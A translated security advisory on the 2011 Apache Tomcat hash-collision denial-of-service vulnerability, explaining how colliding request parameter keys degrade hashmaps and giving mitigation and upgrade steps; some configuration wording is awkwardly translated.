Apache Tomcat hash collision DoS Vulnerability Solution

Cause:
Wed, 28 Dec 2011 22:28:16 GMT apache tomcat released a security vulnerability.

Http://mail-archives.apache.org/mod_mbox/www-announce/201112.mbox/%3C4EFB9800.5010106@apache.org%3E

Vulnerability principle:

In most web Container Designs, requests are implemented by hashtable/hashmap in the corresponding language. When different keys are stored, if the hash values are equal, they are connected as linked lists. The zipper method is one of the solutions to the Hash conflict problem. All elements with the same hash value are linked to the same single-chain table and then placed into the hashtable/hashmap bucket. This is also the implementation of hashmap/hashtable in jdk. The disadvantage of the external zipper method is that it requires a little more space to implement, because adding any element requires adding a pointer to the node, it also takes a little more time for each probe, because it requires indirect reference to search for matching one by one, rather than directly accessing elements. When a large number of elements with the same hash value are saved, the linked list will be very long. When the corresponding elements are obtained, check whether the keys are the same in the linked list until the corresponding elements are found.

Therefore, this vulnerability degrades hashtable/hashmap to a long-chain table by colliding with the same hash value. When the container re-obtains the request, the computing process of map will greatly increase the time complexity, A simple process turns into a very cpu-consuming process.

Affected Versions:
Apache Tomcat 5.x
Apache Tomcat 6.x
Apache Tomcat 7.x

Solution:
Tomcat temporary method:
The default size of maxPostSize is 2097152. When maxPostSize = 0, there is no limit; When maxPostSize = 20971520, it is 20 M, and it is changed to a value smaller than 10 K. All versions are available and will affect users. (Configure in Connector of server. xml)
Persistent tomcat solution:

Upgrade Apache Tomcat to version 5.5.35, 6.0.35, 7.0.23, or later.
In these versions, the maxParameterCount parameter is added (configured in Connector of server. xml, Which is 10000 by default if not configured). The default value of maxParameterCount is 10000.

The "Apache Tomcat Web form hash conflict Denial Of Service Vulnerability" has been detected, and an online server needs to be fully designed. Notes for upgrading an online server:

1. Back up the Tomcat server.

2. Check server. xml and context. xml. Update the settings to the new server version.

3. view the lib of the Tomcat container and copy the jar file added by the user to the new server.

4. view the catalina. sh to see if it is different from the new server version. In particular, you may add JAVA_OPTS = "$ JAVA_OPTS-server-Xms1024m-Xmx2048m-XX: PermSize = 256 M-XX: maxNewSize = 512 m-XX: MaxPermSize = 256 m "to set the available memory size of the server.